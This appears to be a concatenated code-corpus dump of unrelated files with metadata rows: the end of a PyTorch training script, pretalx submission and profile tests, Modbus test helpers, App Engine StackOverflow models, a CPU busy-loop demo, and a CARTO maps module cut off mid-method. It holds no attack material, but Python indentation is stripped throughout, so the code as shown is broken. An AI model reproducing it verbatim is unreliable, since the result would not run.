torch.manual_seed(1)
torch.cuda.manual_seed_all(1)
torch.backends.cudnn.deterministic = True # 保证每次结果一样
start_time = time.time()
print("Loading data...")
vocab, train_data, dev_data, test_data = build_dataset(config, args.word)
train_iter = build_iterator(train_data, config)
dev_iter = build_iterator(dev_data, config)
test_iter = build_iterator(test_data, config)
time_dif = get_time_dif(start_time)
print("Time usage:", time_dif)
# train
config.n_vocab = len(vocab)
model = x.Model().to(config.device)
init_network(model)
print(model.parameters)
train(config, model, train_iter, dev_iter, test_iter)
| 2.5 | 2 |
src/tests/cfp/views/test_cfp_user.py | xhub/pretalx | 0 | 1169 | <filename>src/tests/cfp/views/test_cfp_user.py
import pytest
from django.conf import settings
from django.core import mail as djmail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.urls import reverse
from django_scopes import scope
from rest_framework.authtoken.models import Token
from pretalx.submission.models import SubmissionStates
@pytest.mark.django_db
def test_can_see_submission_list(speaker_client, submission):
response = speaker_client.get(submission.event.urls.user_submissions, follow=True)
assert response.status_code == 200
assert submission.title in response.content.decode()
@pytest.mark.django_db
def test_can_see_submission(speaker_client, submission):
response = speaker_client.get(submission.urls.user_base, follow=True)
assert response.status_code == 200
assert submission.title in response.content.decode()
@pytest.mark.django_db
def test_cannot_see_other_submission(speaker_client, other_submission):
response = speaker_client.get(other_submission.urls.user_base, follow=True)
assert response.status_code == 404
@pytest.mark.django_db
def test_can_confirm_submission(speaker_client, accepted_submission):
response = speaker_client.get(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.ACCEPTED
response = speaker_client.post(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_can_reconfirm_submission(speaker_client, accepted_submission):
accepted_submission.state = SubmissionStates.CONFIRMED
accepted_submission.save()
response = speaker_client.get(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_cannot_confirm_rejected_submission(other_speaker_client, rejected_submission):
rejected_submission.state = SubmissionStates.REJECTED
rejected_submission.save()
response = other_speaker_client.get(rejected_submission.urls.confirm, follow=True)
rejected_submission.refresh_from_db()
assert response.status_code == 200
assert rejected_submission.state == SubmissionStates.REJECTED
@pytest.mark.django_db
def test_can_withdraw_submission(speaker_client, submission):
response = speaker_client.get(submission.urls.withdraw, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.SUBMITTED
response = speaker_client.post(submission.urls.withdraw, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.WITHDRAWN
@pytest.mark.django_db
def test_cannot_withdraw_accepted_submission(speaker_client, accepted_submission):
response = speaker_client.get(accepted_submission.urls.withdraw, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_can_edit_submission(speaker_client, submission, resource, other_resource):
with scope(event=submission.event):
assert submission.resources.count() == 2
resource_one = submission.resources.first()
resource_two = submission.resources.last()
assert submission.title in str(resource_one)
f = SimpleUploadedFile('testfile.txt', b'file_content')
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': submission.slot_count,
'resource-0-id': resource_one.id,
'resource-0-description': 'new resource name',
'resource-0-resource': resource_one.resource,
'resource-1-id': resource_two.id,
'resource-1-DELETE': True,
'resource-1-description': resource_two.description,
'resource-1-resource': resource_two.resource,
'resource-2-id': '',
'resource-2-description': 'new resource',
'resource-2-resource': f,
'resource-TOTAL_FORMS': 3,
'resource-INITIAL_FORMS': 2,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
assert submission.resources.count() == 2
submission.refresh_from_db()
resource_one.refresh_from_db()
new_resource = submission.resources.exclude(pk=resource_one.pk).first()
assert submission.title == 'Ein ganz neuer Titel', response.content.decode()
assert submission.resources.count() == 2
assert new_resource.description == 'new resource'
assert new_resource.resource.read() == b'file_content'
assert not submission.resources.filter(pk=resource_two.pk).exists()
@pytest.mark.django_db
def test_can_edit_slot_count(speaker_client, submission):
with scope(event=submission.event):
submission.event.settings.present_multiple_times = True
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': 13,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.slot_count == 13
@pytest.mark.django_db
def test_cannot_edit_confirmed_slot_count(speaker_client, confirmed_submission):
submission = confirmed_submission
submission.event.settings.present_multiple_times = True
with scope(event=submission.event):
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': 13,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.slot_count != 13
@pytest.mark.django_db
def test_cannot_edit_rejected_submission(other_speaker_client, rejected_submission):
title = rejected_submission.title
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': rejected_submission.submission_type.pk,
'content_locale': rejected_submission.content_locale,
'description': rejected_submission.description,
'abstract': rejected_submission.abstract,
'notes': rejected_submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = other_speaker_client.post(
rejected_submission.urls.user_base, follow=True, data=data
)
assert response.status_code == 200
rejected_submission.refresh_from_db()
assert rejected_submission.title == title
@pytest.mark.django_db
def test_can_edit_submission_type(speaker_client, submission, event):
with scope(event=submission.event):
new_type = event.submission_types.create(name='Other', default_duration=13)
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': new_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.submission_type == new_type
@pytest.mark.django_db
def test_cannot_edit_submission_type_after_acceptance(speaker_client, submission, event):
with scope(event=submission.event):
submission.accept()
new_type = event.submission_types.create(name='Other', default_duration=13)
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': new_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.submission_type != new_type
@pytest.mark.django_db
def test_can_edit_profile(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography == 'Ruling since forever.'
assert speaker.name == '<NAME>'
@pytest.mark.django_db
def test_can_change_api_token(speaker, event, speaker_client):
speaker.regenerate_token()
old_token = Token.objects.filter(user=speaker).first().key
response = speaker_client.post(
event.urls.user,
data={
'form': 'token',
},
follow=True,
)
assert response.status_code == 200
new_token = Token.objects.filter(user=speaker).first().key
assert new_token != old_token
@pytest.mark.django_db
def test_must_provide_availabilities(speaker, event, speaker_client):
event.settings.cfp_require_availabilities = True
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != 'Ruling since forever.'
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
'availabilities': '{"availabilities": []}',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != 'Ruling since forever.'
@pytest.mark.django_db
def test_can_edit_login_info(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'old_password': '<PASSWORD>!',
'email': '<EMAIL>',
'password': '',
'password_repeat': '',
'form': 'login',
},
follow=True,
)
assert response.status_code == 200
speaker.refresh_from_db()
assert speaker.email == '<EMAIL>'
@pytest.mark.django_db
def test_can_edit_login_info_wrong_password(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'old_password': '<PASSWORD>!',
'email': '<EMAIL>',
'password': '',
'password_repeat': '',
'form': 'login',
},
follow=True,
)
assert response.status_code == 200
speaker.refresh_from_db()
assert speaker.email != '<EMAIL>'
@pytest.mark.django_db
def test_can_edit_and_update_speaker_answers(
speaker,
event,
speaker_question,
speaker_boolean_question,
speaker_client,
speaker_text_question,
speaker_file_question,
):
with scope(event=event):
answer = speaker.answers.filter(question_id=speaker_question.pk).first()
assert not answer
f = SimpleUploadedFile('testfile.txt', b'file_content')
response = speaker_client.post(
event.urls.user,
data={
f'question_{speaker_question.id}': 'black as the night',
f'question_{speaker_boolean_question.id}': 'True',
f'question_{speaker_file_question.id}': f,
f'question_{speaker_text_question.id}': 'Green is totally the best color.',
'form': 'questions',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
answer = speaker.answers.get(question_id=speaker_question.pk)
assert answer.answer == 'black as the night'
assert speaker.answers.get(question_id=speaker_boolean_question.pk).answer == 'True'
assert (
speaker.answers.get(question_id=speaker_text_question.pk).answer
== 'Green is totally the best color.'
)
file_answer = speaker.answers.get(question_id=speaker_file_question.pk)
assert file_answer.answer.startswith('file://')
assert file_answer.answer_file.read() == b'file_content'
assert (settings.MEDIA_ROOT / file_answer.answer_file.name).exists()
response = speaker_client.post(
event.urls.user,
data={
f'question_{speaker_question.id}': 'green as the sky',
'form': 'questions',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
answer.refresh_from_db()
assert answer.answer == 'green as the sky'
@pytest.mark.django_db
def test_cannot_delete_profile_on_first_try(speaker, event, speaker_client):
with scope(event=event):
assert speaker.profiles.get(event=event).biography != ''
response = speaker_client.post(event.urls.user_delete, follow=True)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != ''
assert speaker.name != '<NAME>'
@pytest.mark.django_db
def test_can_delete_profile(speaker, event, speaker_client):
with scope(event=event):
assert speaker.profiles.get(event=event).biography != ''
response = speaker_client.post(
event.urls.user_delete, data={'really': True}, follow=True
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography == ''
assert speaker.name == '<NAME>'
assert speaker.email.startswith('deleted_user')
assert speaker.email.endswith('@localhost')
@pytest.mark.django_db
def test_can_change_locale(multilingual_event, client):
first_response = client.get(multilingual_event.cfp.urls.public, follow=True)
assert 'submission' in first_response.content.decode()
assert 'Einreichung' not in first_response.content.decode()
second_response = client.get(
reverse('cfp:locale.set', kwargs={'event': multilingual_event.slug})
+ f'?locale=de&next=/{multilingual_event.slug}/',
follow=True,
)
assert 'Einreichung' in second_response.content.decode()
@pytest.mark.django_db
def test_persists_changed_locale(multilingual_event, orga_user, orga_client):
assert orga_user.locale == 'en'
response = orga_client.get(
reverse('cfp:locale.set', kwargs={'event': multilingual_event.slug})
+ f'?locale=de&next=/{multilingual_event.slug}/',
follow=True,
)
orga_user.refresh_from_db()
assert response.status_code == 200
assert orga_user.locale == 'de'
@pytest.mark.django_db
def test_can_invite_speaker(speaker_client, submission):
djmail.outbox = []
response = speaker_client.get(
submission.urls.invite, follow=True, data={'email': 'invalidemail'}
)
assert response.status_code == 200
data = {
'speaker': '<EMAIL>',
'subject': 'Please join!',
'text': 'C\'mon, it will be fun!',
}
response = speaker_client.post(submission.urls.invite, follow=True, data=data)
assert response.status_code == 200
assert len(djmail.outbox) == 1
assert djmail.outbox[0].to == ['<EMAIL>']
@pytest.mark.django_db
def test_can_accept_invitation(orga_client, submission):
assert submission.speakers.count() == 1
response = orga_client.post(submission.urls.accept_invitation, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.speakers.count() == 2
@pytest.mark.django_db
def test_wrong_acceptance_link(orga_client, submission):
assert submission.speakers.count() == 1
response = orga_client.post(
submission.urls.accept_invitation + 'olololol', follow=True
)
submission.refresh_from_db()
assert response.status_code == 404
assert submission.speakers.count() == 1
@pytest.mark.django_db
@pytest.mark.parametrize('request_availability', (True, False))
def test_submission_accept(speaker_client, submission, request_availability):
submission.event.settings.cfp_request_availabilities = request_availability
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = speaker_client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_submission_accept_with_missing_availability(speaker_client, submission):
submission.event.settings.cfp_request_availabilities = True
submission.event.settings.cfp_require_availabilities = True
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = speaker_client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_submission_accept_nologin(client, submission):
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert response.redirect_chain[-1][1] == 302
assert 'login/?next=' in response.redirect_chain[-1][0]
assert submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_submission_accept_wrong_code(client, submission):
submission.state = SubmissionStates.ACCEPTED
submission.save()
assert submission.code in submission.urls.confirm
response = client.post(
submission.urls.confirm.replace(submission.code, "foo"), follow=True
)
assert response.status_code == 200
assert response.redirect_chain[-1][1] == 302
assert 'login/?next=' in response.redirect_chain[-1][0]
@pytest.mark.django_db
def test_submission_withdraw(speaker_client, submission):
djmail.outbox = []
submission.state = SubmissionStates.SUBMITTED
submission.save()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
submission.refresh_from_db()
assert submission.state == SubmissionStates.WITHDRAWN
assert len(djmail.outbox) == 0
@pytest.mark.django_db
def test_submission_withdraw_if_accepted(speaker_client, submission):
djmail.outbox = []
with scope(event=submission.event):
submission.accept()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state == SubmissionStates.WITHDRAWN
assert len(djmail.outbox) == 1
@pytest.mark.django_db
def test_submission_withdraw_if_confirmed(speaker_client, submission):
with scope(event=submission.event):
submission.accept()
submission.confirm()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state != SubmissionStates.WITHDRAWN
@pytest.mark.django_db
def test_submission_withdraw_if_rejected(speaker_client, submission):
with scope(event=submission.event):
submission.reject()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state != SubmissionStates.WITHDRAWN
| 1.976563 | 2 |
tests/mb_util.py | vasilydenisenko/modbus_rtu_slave | 0 | 1170 | <reponame>vasilydenisenko/modbus_rtu_slave
# MIT License
# Copyright (c) 2021 <NAME>, <NAME>
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import mb_bsp
PDU_SIZE_REG = 0
CONFIG_REG = 1
SLAVE_ADDR_REG = 2
CS_REG = 3
MB_MAX_WRITE_REGNUM = 123
MB_MAX_READ_REGNUM = 125
MB_MAX_REG_ADDR = 65535
MB_MAX_REG_VAL = 65535
MB_MAX_SLAVE_ADDR = 247
MB_MIN_SLAVE_ADDR = 1
MB_MAX_PDU_SIZE = 253
MB_MIN_PDU_SIZE = 1
FCODE_0x3 = 0x3
FCODE_0x6 = 0x6
FCODE_0x10 = 0x10
def incr_err_count():
incr_err_count.count += 1
setattr(incr_err_count, 'count', 0)
def wait_mb_master_status(status):
mb_bsp.wait_master_status(status) # 'FSM status' or 'PDU status'
if mb_bsp.alarm_cb.status_timeout == 1:
print('*** Test FAILED: ', status , ' timeout ***')
mb_bsp.alarm_cb.status_timeout = 0
incr_err_count()
def config_modbus(modbus_role, slave_addr, pdu, config_val):
wait_mb_master_status('FSM status')
if modbus_role == 'Master':
mb_bsp.write_mb_master_cs(CONFIG_REG, config_val) # Set configuration
mb_bsp.write_mb_master_cs(SLAVE_ADDR_REG, slave_addr) # Set slave address
mb_bsp.write_mb_master_cs(PDU_SIZE_REG, len(pdu)) # Set request PDU size
mb_bsp.write_mb_master_pdu(pdu) # Set request PDU
else:
mb_bsp.write_mb_slave_cs(CONFIG_REG, config_val) # Set configuration
mb_bsp.write_mb_slave_cs(SLAVE_ADDR_REG, slave_addr) # Set slave address
def generate_0x03_pdu(addr, regnum):
pdu = list()
ref_pdu = list()
pdu.append(0x3)
ref_pdu.append(0x3)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regnum_h = (regnum & 0xff00) >> 8
pdu.append(regnum_h)
regnum_l = regnum & 0xff
pdu.append(regnum_l)
bytecount = regnum << 1
ref_pdu.append(bytecount)
for i in range(bytecount):
ref_pdu.append(0)
return [pdu, ref_pdu]
def generate_0x06_pdu(addr, regval):
pdu = list()
pdu.append(0x6)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regval_h = (regval[0] & 0xff00) >> 8
pdu.append(regval_h)
regval_l = regval[0] & 0xff
pdu.append(regval_l)
ref_pdu = pdu.copy()
return [pdu, ref_pdu]
def generate_0x10_pdu(addr, regnum, regval):
pdu = list()
pdu.append(0x10)
addr_h = (addr & 0xff00) >> 8
pdu.append(addr_h)
addr_l = (addr & 0xff)
pdu.append(addr_l)
regnum_h = (regnum & 0xff00) >> 8
pdu.append(regnum_h)
regnum_l = regnum & 0xff
pdu.append(regnum_l)
ref_pdu = pdu.copy()
bytecount = regnum_l << 1
pdu.append(bytecount)
for i in range(regnum_l):
regval_h = (regval[i] & 0xff00) >> 8
pdu.append(regval_h)
regval_l = regval[i] & 0xff
pdu.append(regval_l)
return [pdu, ref_pdu]
def print_test_result(result_ok):
if result_ok:
msg = '\tTest Successful'
else:
msg = '\tTest FAILED'
print()
print('***************************')
print(msg)
print('***************************')
print()
def get_total_error_count(modbus_role):
count = 0
error_tuple = mb_bsp.get_error_count()
if modbus_role == 'Both':
for err_list in error_tuple:
for i in err_list:
count += i
elif modbus_role == 'Master':
for i in error_tuple[0]:
count += i
elif modbus_role == 'Slave':
for i in error_tuple[1]:
count += i
return count
def get_single_error_count(modbus_role, error_type):
error_tuple = mb_bsp.get_error_count()
count = 0
if modbus_role == 'Master':
if error_type == 'parity':
count = error_tuple[0][0]
elif error_type == 'start bit':
count = error_tuple[0][1]
elif error_type == 'stop bit':
count = error_tuple[0][2]
elif error_type == 'address':
count = error_tuple[0][3]
elif error_type == 'crc':
count = error_tuple[0][4]
elif modbus_role == 'Slave':
if error_type == 'parity':
count = error_tuple[1][0]
elif error_type == 'start bit':
count = error_tuple[1][1]
elif error_type == 'stop bit':
count = error_tuple[1][2]
elif error_type == 'address':
count = error_tuple[1][3]
elif error_type == 'crc':
count = error_tuple[1][4]
return count
def print_error_count():
error_tuple = mb_bsp.get_error_count()
print()
print('master_parity_err_count = ', error_tuple[0][0])
print('master_start_bit_err_count = ', error_tuple[0][1])
print('master_stop_bit_err_count = ', error_tuple[0][2])
print('master_addr_err_count = ', error_tuple[0][3])
print('master_crc_err_count = ', error_tuple[0][4])
print('slave_parity_err_count = ', error_tuple[1][0])
print('slave_start_bit_err_count = ', error_tuple[1][1])
print('slave_stop_bit_err_count = ', error_tuple[1][2])
print('slave_addr_err_count = ', error_tuple[1][3])
print('slave_crc_err_count = ', error_tuple[1][4])
print('--------------------------------')
print()
| 1.96875 | 2 |
modules/stackoverflow/models.py | tjsavage/polymer-dashboard | 1 | 1171 | <gh_stars>1-10
import fix_path
import json
import datetime
from google.appengine.ext import ndb
# Taken from http://stackoverflow.com/questions/455580/json-datetime-between-python-and-javascript
dthandler = lambda obj: (
obj.isoformat()
if isinstance(obj, datetime.datetime)
or isinstance(obj, datetime.date)
else None
)
class StackOverflowSnapshot(ndb.Model):
"""Example Model"""
raw_timestamp = ndb.DateTimeProperty(required=True, auto_now_add=True)
requested_time = ndb.DateTimeProperty(required=True)
num_questions_by_tag = ndb.JsonProperty()
num_tagged_questions = ndb.IntegerProperty()
num_answered = ndb.IntegerProperty()
num_unanswered = ndb.IntegerProperty()
total_question_views = ndb.IntegerProperty()
status = ndb.StringProperty()
status_string = ndb.StringProperty()
def as_dict(self):
result = {}
result['requested_time'] = dthandler(self.requested_time)
result['num_tagged_questions'] = self.num_tagged_questions
result['num_questions_by_tag'] = self.num_questions_by_tag
result['num_answered'] = self.num_answered
result['num_unanswered'] = self.num_unanswered
result['total_question_views'] = self.total_question_views
result['status'] = self.status
result['status_string'] = self.status_string
return result
class StackOverflowQuestion(ndb.Model):
first_seen = ndb.DateTimeProperty(required=True, auto_now_add=True)
tags = ndb.StringProperty(repeated=True)
is_answered = ndb.BooleanProperty()
view_count = ndb.IntegerProperty()
answer_count = ndb.IntegerProperty()
url = ndb.StringProperty()
title = ndb.StringProperty()
creation_date = ndb.DateTimeProperty()
question_id = ndb.IntegerProperty()
def as_dict(self):
result = {}
result['first_seen'] = dthandler(self.first_seen)
result['tags'] = [t for t in self.tags]
result['is_answered'] = self.is_answered
result['view_count'] = self.view_count
result['answer_count'] = self.answer_count
result['url'] = self.url
result['title'] = self.title
result['creation_date'] = dthandler(self.creation_date)
result['question_id'] = self.question_id
return result
def update_to_stackexchange_question(self, stackexchange_question):
updated = False
if stackexchange_question.tags != self.tags:
self.tags = stackexchange_question.tags
updated = True
if stackexchange_question.json['is_answered'] != self.is_answered:
self.is_answered = stackexchange_question.json['is_answered']
updated = True
if stackexchange_question.view_count != self.view_count:
self.view_count = stackexchange_question.view_count
updated = True
if stackexchange_question.json['answer_count'] != self.answer_count:
self.answer_count = stackexchange_question.json['answer_count']
updated = True
if stackexchange_question.url != self.url:
self.url = stackexchange_question.url
updated = True
if stackexchange_question.title != self.title:
self.title = stackexchange_question.title
updated = True
if stackexchange_question.creation_date != self.creation_date:
self.creation_date = stackexchange_question.creation_date
updated = True
if stackexchange_question.json['question_id'] != self.question_id:
self.question_id = stackexchange_question.json['question_id']
updated = True
return updated
@classmethod
def from_stackexchange_question(cls, stackexchange_question):
result = cls(
tags = [t for t in stackexchange_question.tags],
is_answered = stackexchange_question.json['is_answered'],
view_count = stackexchange_question.view_count,
answer_count = stackexchange_question.json['answer_count'],
url = stackexchange_question.url,
title = stackexchange_question.title,
creation_date = stackexchange_question.creation_date,
question_id = stackexchange_question.json['question_id']
)
return result | 2.515625 | 3 |
src/main/java/com/bailei/study/beautyOfCoding/cpu50.py | sonymoon/algorithm | 0 | 1172 | #!/usr/bin/python3
# -*- coding: UTF-8 -*-
import time
busyTime = 10
idleTime = busyTime
while True:
start = time.clock()
while time.clock() - start < busyTime:
pass
time.sleep(busyTime / 1000)
| 3.328125 | 3 |
carto/maps.py | danicarrion/carto-python | 85 | 1173 | """
Module for working with named and anonymous maps
.. module:: carto.maps
:platform: Unix, Windows
:synopsis: Module for working with named and anonymous maps
.. moduleauthor:: <NAME> <<EMAIL>>
.. moduleauthor:: <NAME> <<EMAIL>>
"""
try:
from urllib.parse import urljoin
except ImportError:
from urlparse import urljoin
from pyrestcli.resources import Manager, Resource
from .exceptions import CartoException, CartoRateLimitException
API_VERSION = "v1"
NAMED_API_ENDPOINT = "api/{api_version}/map/named/"
ANONYMOUS_API_ENDPOINT = "api/{api_version}/map/"
class BaseMap(Resource):
"""
Base class for NamedMap and AnonymousMap
"""
def __init__(self, auth_client):
"""
Initializes a BaseMap instance
:param auth_client: Auth client
"""
super(BaseMap, self).__init__(auth_client)
def get_tile_url(self, x, y, z, layer_id=None, feature_id=None,
filter=None, extension="png"):
"""
Prepares a URL to get data (raster or vector) from a NamedMap or
AnonymousMap
:param x: The x tile
:param y: The y tile
:param z: The zoom level
:param layer_id: Can be a number (referring to the # layer of your \
map), all layers of your map, or a list of layers.
To show just the basemap layer, enter the value 0
To show the first layer, enter the value 1
To show all layers, enter the value 'all'
To show a list of layers, enter the comma separated \
layer value as '0,1,2'
:param feature_id: The id of the feature
:param filter: The filter to be applied to the layer
:param extension: The format of the data to be retrieved: png, mvt, ...
:type x: int
:type y: int
:type z: int
:type layer_id: str
:type feature_id: str
:type filter: str
:type extension: str
:return: A URL to download data
:rtype: str
:raise: CartoException
"""
base_url = self.client.base_url + self.Meta.collection_endpoint
template_id = self.template_id if hasattr(self, 'template_id') \
else self.layergroupid
if layer_id is not None and feature_id is not None:
url = urljoin(base_url,
"{template_id}/{layer}/attributes/{feature_id}"). \
format(template_id=template_id,
layer=layer_id,
feature_id=feature_id)
elif layer_id is not None and filter is not None:
url = urljoin(base_url,
"{template_id}/{filter}/{z}/{x}/{y}.{extension}"). \
format(template_id=template_id,
filter=filter,
z=z, x=x, y=y,
extension=extension)
elif layer_id is not None:
url = urljoin(base_url,
"{template_id}/{layer}/{z}/{x}/{y}.{extension}"). \
format(template_id=template_id,
layer=layer_id,
z=z, x=x, y=y,
extension=extension)
else:
url = urljoin(base_url, "{template_id}/{z}/{x}/{y}.{extension}"). \
format(
template_id=template_id,
z=z, x=x, y=y,
extension=extension)
if hasattr(self, 'auth') and self.auth is not None \
and len(self.auth['valid_tokens']) > 0:
url = urljoin(url, "?auth_token={auth_token}"). \
format(auth_token=self.auth['valid_tokens'][0])
return url
class NamedMap(BaseMap):
"""
Equivalent to creating a named map in CARTO.
"""
class Meta:
collection_endpoint = NAMED_API_ENDPOINT.format(
api_version=API_VERSION)
id_field = "template_id"
name_field = "name"
def __str__(self):
try:
return unicode(self.name).encode("utf-8")
except AttributeError:
return super(NamedMap, self).__repr__()
def __init__(self, auth_client):
"""
Initializes a NamedMap instance
:param auth_client: Auth client
"""
self.fields = ["version",
"name",
"auth",
"placeholders",
"layergroup",
"view"]
# Optional fields can be assigned by some responses create, instantiate,
# but are not saved to the backend
self.optional_fields = ["template_id", "layergroupid", "last_updated"]
super(NamedMap, self).__init__(auth_client)
def instantiate(self, params, auth=None):
"""
Allows you to fetch the map tiles of a created map
:param params: The json with the styling info for the named map
:param auth: The auth client
:type params: dict
:type auth: :class:`carto.auth.APIKeyAuthClient`
:return:
:raise: CartoException
"""
try:
endpoint = (self.Meta.collection_endpoint
+ "{template_id}"). \
format(template_id=self.template_id)
if (auth is not None):
endpoint = (endpoint + "?auth_token={auth_token}"). \
format(auth_token=auth)
self.send(endpoint, "POST", json=params)
except CartoRateLimitException as e:
raise e
except Exception as e:
raise CartoException(e)
def update_from_dict(self, attribute_dict):
"""
Method overriden from the base class
"""
if 'template' in attribute_dict:
self.update_from_dict(attribute_dict['template'])
setattr(self,
self.Meta.id_field, attribute_dict['template']['name'])
return
try:
for k, v in attribute_dict.items():
if k in self.fields + self.optional_fields:
setattr(self, k, v)
except Exception:
setattr(self, self.Meta.id_field, attribute_dict)
class AnonymousMap(BaseMap):
"""
Equivalent to creating an anonymous map in CARTO.
"""
class Meta:
collection_endpoint = ANONYMOUS_API_ENDPOINT.format(
api_version=API_VERSION)
def __init__(self, auth_client):
"""
Initializes an AnonymousMap instance
:param auth_client: Auth client
"""
self.optional_fields = ['cdn_url', 'last_updated', 'layergroupid', 'metadata']
super(AnonymousMap, self).__init__(auth_client)
def instantiate(self, params):
"""
Allows you to fetch the map tiles of a created map
:param params: The json with the styling info for the named map
:type params: dict
:return:
:raise: CartoException
"""
try:
